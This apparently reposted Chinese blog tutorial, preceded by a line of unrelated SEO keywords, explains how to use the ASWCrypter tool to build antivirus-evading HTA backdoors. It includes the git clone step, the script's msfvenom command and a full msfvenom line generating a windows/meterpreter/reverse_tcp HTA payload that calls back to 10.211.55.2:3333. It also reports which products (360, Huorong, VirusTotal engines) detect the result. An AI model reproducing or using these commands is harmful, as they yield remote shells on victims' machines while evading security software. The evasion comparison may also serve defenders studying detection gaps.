有wordpress模板安装教程视频教程,济南网站seo报价,网站后端用什么软件做,网站建设尺寸免杀能力一览表 几点说明#xff1a;
1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。
2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶…免杀能力一览表 几点说明
1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。
2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2020.01.01)火绒版本5.0.34.16(2020.01.01)360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。
一、ASWCrypter介绍
ASWCrypter是2018年开源的免杀工具原理比较简单使用msf生成hta代码然后使用python脚本对hta代码进行一定编码处理生成新的hta后门文件从而达到免杀效果。
二、安装ASWCrypter
需要本机安装metasploit和python环境。
ASWCrypter的安装比较简单,先git clone到本地
git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git进入ASWCrypter目录执行chmod x ./ASWCrypter.sh。
执行./ASWCrypter.sh即可运行ASWCrypter。
三、ASWCrypter使用说明
使用时需要注意的只有一点就是要在linux桌面环境中运行因为在ASWCrypter.sh脚本中调用msfvenom生成后门时使用了xterm。
xterm -T SHELLCODE GENERATOR(ASWCrypter) -geometry 100x50 -e msfvenom -p $paylo LHOST$lhost LPORT$lport -i 43 -f hta-psh $getPATH/output/chars.raw四、利用ASWCrypter生成后门
执行./ASWCrypter.sh选择G第一步也只有这个能选 然后输入LHOST和LPORT 后门选择payload,我还是选择最常规的reverse_tcp了,文件名就随便输一个了 之后提示生成test4.hta成功后面会提示是否开启msf监听我这就不需要了还是在mac上监听端口。 不开杀软的时候可正常上线 打开杀软火绒静态和动态都能查杀360动态静态都没报警。 试了下msfvenom生成的原始的hta文件的查杀率 msfvenom -p windows/meterpreter/reverse_tcp LHOST10.211.55.2 LPORT3333 -f hta-psh -o test5.htavirustotal.com上查杀率为28/56
五、ASWCrypter小结
ASWCrypter是使用msfvenom生成基于powershell的hta后门文件然后进行编码处理达到一定的免杀效果不过因为会调用powershell行为检测还是很容易被检测出来。
六、参考资料
官方Github:https://github.com/abedalqaderswedan1/aswcrypter
